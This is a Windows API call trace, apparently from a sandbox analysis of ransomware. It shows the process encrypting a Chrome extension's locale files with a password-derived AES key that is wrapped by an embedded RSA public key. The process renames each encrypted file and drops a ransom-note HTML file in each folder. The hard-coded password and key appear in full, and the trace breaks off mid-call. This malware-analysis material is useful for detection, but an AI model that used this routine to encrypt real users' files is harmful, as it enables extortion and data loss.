DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.gsg")) returned 1 [0251.850] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.fuck")) returned 1 [0251.852] CryptDestroyHash (hHash=0x29846a0) returned 1 [0251.852] CryptDestroyKey (hKey=0x29847a0) returned 1 [0251.852] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.852] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.852] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.852] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0251.852] AreFileApisANSI () returned 1 [0251.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.852] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.854] GetFileType (hFile=0x5d60) returned 0x1 [0251.854] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.855] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.855] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.856] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.856] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.856] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.856] GetLastError () returned 0x0 [0251.856] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json")) returned 0x20 [0251.856] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0251.857] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.857] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.864] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.864] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.866] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.866] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.866] CryptHashData (hHash=0x29844e0, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.866] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29844e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984720) returned 1 [0251.867] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.867] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.867] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298abf0) returned 1 [0251.867] CryptImportPublicKeyInfo (in: hCryptProv=0x298abf0, dwCertEncodingType=0x1, pInfo=0x2992430*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992460*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992468*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984020) returned 1 [0251.867] CryptEncrypt (in: hKey=0x2984020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.867] CryptEncrypt (in: hKey=0x2984020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ae10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ae10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.868] WriteFile (in: hFile=0x5d64, lpBuffer=0x298ae10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ae10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.869] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.870] CryptEncrypt (in: hKey=0x2984720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.870] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.871] CloseHandle (hObject=0x5d5c) returned 1 [0251.871] CloseHandle (hObject=0x5d64) returned 1 [0251.871] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0251.874] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0251.875] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.gsg")) returned 1 [0251.876] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.fuck")) returned 1 [0251.877] CryptDestroyHash (hHash=0x29844e0) returned 1 [0251.877] CryptDestroyKey (hKey=0x2984720) returned 1 [0251.877] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.877] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.877] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.877] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0251.877] AreFileApisANSI () returned 1 [0251.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.877] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.878] GetFileType (hFile=0x5d60) returned 0x1 [0251.878] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.879] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.880] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.880] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.880] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.880] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.880] GetLastError () returned 0x0 [0251.880] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json")) returned 0x20 [0251.881] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json", dwFileAttributes=0x80) returned 1 [0251.882] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.882] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.883] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0251.886] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.886] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.886] CryptHashData (hHash=0x2984120, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.886] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984120, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29841a0) returned 1 [0251.886] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.886] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.886] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b250) returned 1 [0251.887] CryptImportPublicKeyInfo (in: hCryptProv=0x298b250, dwCertEncodingType=0x1, pInfo=0x2992c50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992c80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992c88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29846e0) returned 1 [0251.887] CryptEncrypt (in: hKey=0x29846e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.887] CryptEncrypt (in: hKey=0x29846e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a480*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a480*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.887] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298a480*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a480*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.888] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.889] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.889] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.889] CloseHandle (hObject=0x5d64) returned 1 [0251.889] CloseHandle (hObject=0x5d5c) returned 1 [0251.890] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), bFailIfExists=0) returned 1 [0251.893] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json", dwFileAttributes=0x0) returned 1 [0251.894] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.gsg")) returned 1 [0251.895] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.fuck")) returned 1 [0251.896] CryptDestroyHash (hHash=0x2984120) returned 1 [0251.896] CryptDestroyKey (hKey=0x29841a0) returned 1 [0251.896] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.896] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.896] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.896] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\readme_back_files.htm")) returned 0xffffffff [0251.896] AreFileApisANSI () returned 1 [0251.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.896] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.897] GetFileType (hFile=0x5d60) returned 0x1 [0251.897] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.898] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.899] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.899] FindNextFileA (in: 